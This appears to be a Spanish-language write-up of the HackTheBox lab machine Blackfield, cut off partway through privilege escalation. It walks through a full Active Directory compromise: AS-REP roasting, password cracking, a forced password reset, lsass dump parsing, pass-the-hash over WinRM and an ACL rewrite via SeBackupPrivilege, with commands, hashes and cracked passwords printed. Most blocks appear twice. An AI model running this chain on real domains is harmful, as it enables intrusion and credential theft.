HackTheBox machines - Blackfield WriteUp

Blackfield es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Difícil.

En este caso se trata de una máquina basada en el Sistema Operativo Windows.

Índice

Escaneo de puertos

Como de costumbre, agregamos la IP de la máquina Blackfield 10.10.10.192 a /etc/hosts como blackfield.htb y comenzamos con el escaneo de puertos nmap.

# Nmap 7.80 scan initiated Sat Jun  6 22:29:11 2020 as: nmap -sC -sV -Pn -p- -oA nmap/blackfield 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.051s latency).
Not shown: 65527 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-07 03:32:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/6%Time=5EDBFD0E%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h01m30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-07T03:34:57
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun  6 22:34:03 2020 -- 1 IP address (1 host up) scanned in 291.32 seconds

# Nmap 7.80 scan initiated Sat Jun 6 22:29:11 2020 as: nmap -sC -sV -Pn -p- -oA nmap/blackfield 10.10.10.192

Nmap scan report for 10.10.10.192

Host is up (0.051s latency).

Not shown: 65527 filtered ports

PORT STATE SERVICE VERSION

53/tcp open domain?

| fingerprint-strings:

| DNSVersionBindReqTCP:

| version

|_ bind

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-07 03:32:36Z)

135/tcp open msrpc Microsoft Windows RPC

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)

445/tcp open microsoft-ds?

593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port53-TCP:V=7.80%I=7%D=6/6%Time=5EDBFD0E%P=x86_64-pc-linux-gnu%r(DNSVe

SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x

SF:04bind\0\0\x10\0\x03");

Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: 7h01m30s

| smb2-security-mode:

| 2.02:

|_ Message signing enabled and required

| smb2-time:

| date: 2020-06-07T03:34:57

|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Jun 6 22:34:03 2020 -- 1 IP address (1 host up) scanned in 291.32 seconds

Encontramos varios puertos interesantes así que procedemos con la enumeración de los mismos.

Enumeración

Procedemos entre otras cosas a enumerar el servicio SMB, con la idea de intentar obtener información de los directorios compartidos existentes:

$ smbclient -L \\\\10.10.10.192\\
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

$ smbclient -L \\\\10.10.10.192\\

Enter WORKGROUP\root's password:

Sharename Type Comment

--------- ---- -------

ADMIN$ Disk Remote Admin

C$ Disk Default share

forensic Disk Forensic / Audit share.

IPC$ IPC Remote IPC

NETLOGON Disk Logon server share

profiles$ Disk

SYSVOL Disk Logon server share

SMB1 disabled -- no workgroup available

Y obtenemos un listado de usuarios en la carpeta profiles$, así que generamos un listado de usuarios con los mismos.

Realizaremos también una enumeración de ldap para intentar obtener más información del dominio:

$ ldapsearch -H ldap://10.10.10.192 -x -s base '' "(objectClass=*)" "*"
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting:  (objectClass=*) * 
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=BLACKFIELD,DC=local
ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=lo
 cal
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=BLACKFIELD,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=BLACKFIELD,DC=local
namingContexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingContexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local
isSynchronized: TRUE
highestCommittedUSN: 167151
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
 CN=Sites,CN=Configuration,DC=BLACKFIELD,DC=local
dnsHostName: DC01.BLACKFIELD.local
defaultNamingContext: DC=BLACKFIELD,DC=local
currentTime: 20200607033847.0Z
configurationNamingContext: CN=Configuration,DC=BLACKFIELD,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

$ ldapsearch -H ldap://10.10.10.192 -x -s base '' "(objectClass=*)" "*"

# extended LDIF

# LDAPv3

# base <> (default) with scope baseObject

# filter: (objectclass=*)

# requesting: (objectClass=*) *

dn:

domainFunctionality: 7

forestFunctionality: 7

domainControllerFunctionality: 7

rootDomainNamingContext: DC=BLACKFIELD,DC=local

ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL

isGlobalCatalogReady: TRUE

supportedSASLMechanisms: GSSAPI

supportedSASLMechanisms: GSS-SPNEGO

supportedSASLMechanisms: EXTERNAL

supportedSASLMechanisms: DIGEST-MD5

supportedLDAPVersion: 3

supportedLDAPVersion: 2

supportedLDAPPolicies: MaxPoolThreads

supportedLDAPPolicies: MaxPercentDirSyncRequests

supportedLDAPPolicies: MaxDatagramRecv

supportedLDAPPolicies: MaxReceiveBuffer

supportedLDAPPolicies: InitRecvTimeout

supportedLDAPPolicies: MaxConnections

supportedLDAPPolicies: MaxConnIdleTime

supportedLDAPPolicies: MaxPageSize

supportedLDAPPolicies: MaxBatchReturnMessages

supportedLDAPPolicies: MaxQueryDuration

supportedLDAPPolicies: MaxDirSyncDuration

supportedLDAPPolicies: MaxTempTableSize

supportedLDAPPolicies: MaxResultSetSize

supportedLDAPPolicies: MinResultSets

supportedLDAPPolicies: MaxResultSetsPerConn

supportedLDAPPolicies: MaxNotificationPerConn

supportedLDAPPolicies: MaxValRange

supportedLDAPPolicies: MaxValRangeTransitive

supportedLDAPPolicies: ThreadMemoryLimit

supportedLDAPPolicies: SystemMemoryLimitPercent

supportedControl: 1.2.840.113556.1.4.319

supportedControl: 1.2.840.113556.1.4.801

supportedControl: 1.2.840.113556.1.4.473

supportedControl: 1.2.840.113556.1.4.528

supportedControl: 1.2.840.113556.1.4.417

supportedControl: 1.2.840.113556.1.4.619

supportedControl: 1.2.840.113556.1.4.841

supportedControl: 1.2.840.113556.1.4.529

supportedControl: 1.2.840.113556.1.4.805

supportedControl: 1.2.840.113556.1.4.521

supportedControl: 1.2.840.113556.1.4.970

supportedControl: 1.2.840.113556.1.4.1338

supportedControl: 1.2.840.113556.1.4.474

supportedControl: 1.2.840.113556.1.4.1339

supportedControl: 1.2.840.113556.1.4.1340

supportedControl: 1.2.840.113556.1.4.1413

supportedControl: 2.16.840.1.113730.3.4.9

supportedControl: 2.16.840.1.113730.3.4.10

supportedControl: 1.2.840.113556.1.4.1504

supportedControl: 1.2.840.113556.1.4.1852

supportedControl: 1.2.840.113556.1.4.802

supportedControl: 1.2.840.113556.1.4.1907

supportedControl: 1.2.840.113556.1.4.1948

supportedControl: 1.2.840.113556.1.4.1974

supportedControl: 1.2.840.113556.1.4.1341

supportedControl: 1.2.840.113556.1.4.2026

supportedControl: 1.2.840.113556.1.4.2064

supportedControl: 1.2.840.113556.1.4.2065

supportedControl: 1.2.840.113556.1.4.2066

supportedControl: 1.2.840.113556.1.4.2090

supportedControl: 1.2.840.113556.1.4.2205

supportedControl: 1.2.840.113556.1.4.2204

supportedControl: 1.2.840.113556.1.4.2206

supportedControl: 1.2.840.113556.1.4.2211

supportedControl: 1.2.840.113556.1.4.2239

supportedControl: 1.2.840.113556.1.4.2255

supportedControl: 1.2.840.113556.1.4.2256

supportedControl: 1.2.840.113556.1.4.2309

supportedControl: 1.2.840.113556.1.4.2330

supportedControl: 1.2.840.113556.1.4.2354

supportedCapabilities: 1.2.840.113556.1.4.800

supportedCapabilities: 1.2.840.113556.1.4.1670

supportedCapabilities: 1.2.840.113556.1.4.1791

supportedCapabilities: 1.2.840.113556.1.4.1935

supportedCapabilities: 1.2.840.113556.1.4.2080

supportedCapabilities: 1.2.840.113556.1.4.2237

subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=lo

cal

serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur

ation,DC=BLACKFIELD,DC=local

schemaNamingContext: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local

namingContexts: DC=BLACKFIELD,DC=local

namingContexts: CN=Configuration,DC=BLACKFIELD,DC=local

namingContexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local

namingContexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local

namingContexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local

isSynchronized: TRUE

highestCommittedUSN: 167151

dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,

CN=Sites,CN=Configuration,DC=BLACKFIELD,DC=local

dnsHostName: DC01.BLACKFIELD.local

defaultNamingContext: DC=BLACKFIELD,DC=local

currentTime: 20200607033847.0Z

configurationNamingContext: CN=Configuration,DC=BLACKFIELD,DC=local

# search result

search: 2

result: 0 Success

# numResponses: 2

# numEntries: 1

Descubierto el dominio y, con el listado de usuarios generado, utilizamos la herramienta GetNPUsers de impacket para intentar obtener algún hash:

$ GetNPUsers.py -usersfile users.txt -no-pass -dc-ip 10.10.10.192 BLACKFIELD.LOCAL/ | grep -v SessionError
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:0d0fd51854362b6e93600a1e7c82c695$b51bb67f84d4cd0f0bbef68ab127fdcee47f81bdf55a246f9bd8a88bd77de392920c162cb3b2269d559887dcc13693ebbb8f09661064ed1785914da89708a9b47607d0bb1eb9cbe1e1c9c5e77472d1763280dbe77d13cd11d90e4a76e40959230dc92a801e1ac312169fa362cbb173fbce9e0e577594ab9d30276a2242e291ee325c340a53082edf3551cd2b6a161475b1b502d79b8641df209e514e78765fa386ebb7ac21337b11bebc11cfc0702a4f84ebff610a10d0bc62e1772e8a91d00617b428a9341a028e9765dfbcf316b73a9f4bdff5c78ae4794cfdb8286aef2fb9621a5087568d5cf2f41449ae94d05f925697ad0c
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

$ GetNPUsers.py -usersfile users.txt -no-pass -dc-ip 10.10.10.192 BLACKFIELD.LOCAL/ | grep -v SessionError

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set

$krb5asrep$23$support@BLACKFIELD.LOCAL:0d0fd51854362b6e93600a1e7c82c695$b51bb67f84d4cd0f0bbef68ab127fdcee47f81bdf55a246f9bd8a88bd77de392920c162cb3b2269d559887dcc13693ebbb8f09661064ed1785914da89708a9b47607d0bb1eb9cbe1e1c9c5e77472d1763280dbe77d13cd11d90e4a76e40959230dc92a801e1ac312169fa362cbb173fbce9e0e577594ab9d30276a2242e291ee325c340a53082edf3551cd2b6a161475b1b502d79b8641df209e514e78765fa386ebb7ac21337b11bebc11cfc0702a4f84ebff610a10d0bc62e1772e8a91d00617b428a9341a028e9765dfbcf316b73a9f4bdff5c78ae4794cfdb8286aef2fb9621a5087568d5cf2f41449ae94d05f925697ad0c

[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

Y conseguimos el hash del usuario support. Utilizaremos John The Ripper para intentar descifrar la password del mismo:

$ john support.hash  -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:31 DONE (2020-06-07 11:24) 0.03146g/s 451069p/s 451069c/s 451069C/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ john support.hash -w=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8

Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])

Will run 2 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)

1g 0:00:00:31 DONE (2020-06-07 11:24) 0.03146g/s 451069p/s 451069c/s 451069C/s #1ByNature..#*burberry#*1990

Use the "--show" option to display all of the cracked passwords reliably

Session completed

Y obtenemos la misma:

$ john --show support.hash 
$krb5asrep$23$support@BLACKFIELD.LOCAL:#00^BlackKnight 
1 password hash cracked, 0 left

$ john --show support.hash

$krb5asrep$23$support@BLACKFIELD.LOCAL:#00^BlackKnight

1 password hash cracked, 0 left

Con las credenciales obtenidas intentamos obtener más información del dominio y de los usuarios existentes. Utilizaremos bloodhound-python para obtener más información del mismo:

$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d BLACKFIELD.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users

$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d BLACKFIELD.local -ns 10.10.10.192

INFO: Found AD domain: blackfield.local

INFO: Connecting to LDAP server: dc01.blackfield.local

INFO: Found 1 domains

INFO: Found 1 domains in the forest

INFO: Found 18 computers

INFO: Connecting to LDAP server: dc01.blackfield.local

INFO: Found 315 users

Con la información obtenida, descubrimos que podemos resetear el password del usuario audit2020 con el usuario support así que procedemos a realizar el mismo a través de la conexión por rpc:

$ rpcclient -U support //10.10.10.192
Enter WORKGROUP\support's password: 
rpcclient $>
rpcclient $> setuserinfo2 audit2020 23 'Asdf123.' 
rpcclient $>

$ rpcclient -U support //10.10.10.192

Enter WORKGROUP\support's password:

rpcclient $>

rpcclient $> setuserinfo2 audit2020 23 'Asdf123.'

rpcclient $>

Una vez reseteada, verificamos el acceso con CrackMapExec y vemos que podemos acceder a smb con este usuario:

$ cme smb 10.10.10.192 -u audit2020 -p 'Asdf123.' 
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Asdf123.

$ cme smb 10.10.10.192 -u audit2020 -p 'Asdf123.'

SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)

SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Asdf123.

Así que utilizaremos smbmap para comprobar donde tenemos acceso con este usuario:

smbmap -u audit2020 -p 'Asdf123.' -H 10.10.10.192
[+] IP: 10.10.10.192:445        Name: blackfield.htb                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

smbmap -u audit2020 -p 'Asdf123.' -H 10.10.10.192

[+] IP: 10.10.10.192:445 Name: blackfield.htb

Disk Permissions Comment

---- ----------- -------

ADMIN$ NO ACCESS Remote Admin

C$ NO ACCESS Default share

forensic READ ONLY Forensic / Audit share.

IPC$ READ ONLY Remote IPC

NETLOGON READ ONLY Logon server share

profiles$ READ ONLY

SYSVOL READ ONLY Logon server share

Y observamos que tenemos acceso a la carpeta forensic, a la cual no teníamos anteriormente. Procedemos a descargarnos los ficheros existentes y observamos que se trata de varios ficheros de crash dumps de windows, entre los que encontramos uno muy interesante, lsass.zip:

$ ls -1
conhost.zip
ctfmon.zip
dfsrs.zip
dllhost.zip
ismserv.zip
lsass.zip
mmc.zip
RuntimeBroker.zip
ServerManager.zip
sihost.zip
smartscreen.zip
svchost.zip
taskhostw.zip
winlogon.zip
wlms.zip
WmiPrvSE.zip

$ ls -1

conhost.zip

ctfmon.zip

dfsrs.zip

dllhost.zip

ismserv.zip

lsass.zip

mmc.zip

RuntimeBroker.zip

ServerManager.zip

sihost.zip

smartscreen.zip

svchost.zip

taskhostw.zip

winlogon.zip

wlms.zip

WmiPrvSE.zip

Extraemos el contenido del fichero zip y trataremos de obtener las credenciales con la herramienta pypykatz:

$ pypykatz lsa minidump lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
	== SSP [633ba]==
		username 
		domainname 
		password None
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
		Password: None
	== WDIGEST [633ba]==
		username svc_backup

$ pypykatz lsa minidump lsass.DMP

FILE: ======== lsass.DMP =======

== LogonSession ==

authentication_id 406458 (633ba)

session_id 2

username svc_backup

domainname BLACKFIELD

logon_server DC01

logon_time 2020-02-23T18:00:03.423728+00:00

sid S-1-5-21-4194615774-2175524697-3563712290-1413

luid 406458

== MSV ==

Username: svc_backup

Domain: BLACKFIELD

LM: NA

NT: 9658d1d1dcd9250115e2205d9f48400d

SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c

== WDIGEST [633ba]==

username svc_backup

domainname BLACKFIELD

password None

== SSP [633ba]==

username

domainname

password None

== Kerberos ==

Username: svc_backup

Domain: BLACKFIELD.LOCAL

Password: None

== WDIGEST [633ba]==

username svc_backup

En este caso sólo vemos una pequeña parte del contenido obtenido, pero vemos como nos devuelve el hash del usuario svc_backup que utilizaremos posteriormente para loguearnos en el sistema.

Obteniendo la flag de user

Con el hash obtenido, accedemos con la herramienta evil-winrm:

$ ruby evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\svc_backup\desktop> ls


    Directory: C:\Users\svc_backup\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/9/2020   9:30 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\desktop>

$ ruby evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami

blackfield\svc_backup

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\desktop

*Evil-WinRM* PS C:\Users\svc_backup\desktop> ls

Directory: C:\Users\svc_backup\desktop

Mode LastWriteTime Length Name

---- ------------- ------ ----

-ar--- 6/9/2020 9:30 AM 34 user.txt

*Evil-WinRM* PS C:\Users\svc_backup\desktop>

Y estamos dentro de la máquina, consiguiendo con ello la flag de user.

Escalado de privilegios

Una vez que estamos dentro, revisamos los permisos del usuario:

*Evil-WinRM* PS C:\Users\svc_backup\desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\svc_backup\desktop> whoami /all

USER INFORMATION

----------------

User Name SID

===================== ==============================================

blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413

GROUP INFORMATION

-----------------

Group Name Type SID Attributes

========================================== ================ ============ ==================================================

Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group

BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group

BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group

BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group

BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group

Mandatory Label\High Mandatory Level Label S-1-16-12288

PRIVILEGES INFORMATION

----------------------

Privilege Name Description State

============================= ============================== =======

SeMachineAccountPrivilege Add workstations to domain Enabled

SeBackupPrivilege Back up files and directories Enabled

SeRestorePrivilege Restore files and directories Enabled

SeShutdownPrivilege Shut down the system Enabled

SeChangeNotifyPrivilege Bypass traverse checking Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION

-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Y encontramos dos permisos muy interesantes, SeBackupPrivilege y SeRestorePrivilege.

Revisando en google, encontramos una forma de poder realizar un backup y conseguir los ficheros que necesitamos con la herramienta diskshadow.

Aunque antes de poder hacer esto necesitamos editar los permisos del sistema para poder leer ciertos ficheros para los cuales no tenemos permisos, para ello haremos uso de las acl de windows para cambiar el propietario de los ficheros del sistema.

Y ejecutaremos los siguientes comandos:

powershell -ep bypass
$path = "C:\"
$user = "blackfield\svc_backup"
$acl = get-acl $path
$acl_rule = $user,'FullControl','ContainerInherit,ObjectInherit','None','Allow'
$access_rule = New-Object System.Security.AccessControl.FileSystemAccessRule $acl_rule
$acl.AddAccessRule($access_rule)
Set-Acl -Path $path -AclObject $acl

powershell -ep bypass

$path = "C:\"

$user = "blackfield\svc_backup"

$acl = get-acl $path

$acl_rule = $user,'FullControl','ContainerInherit,ObjectInherit','None','Allow'

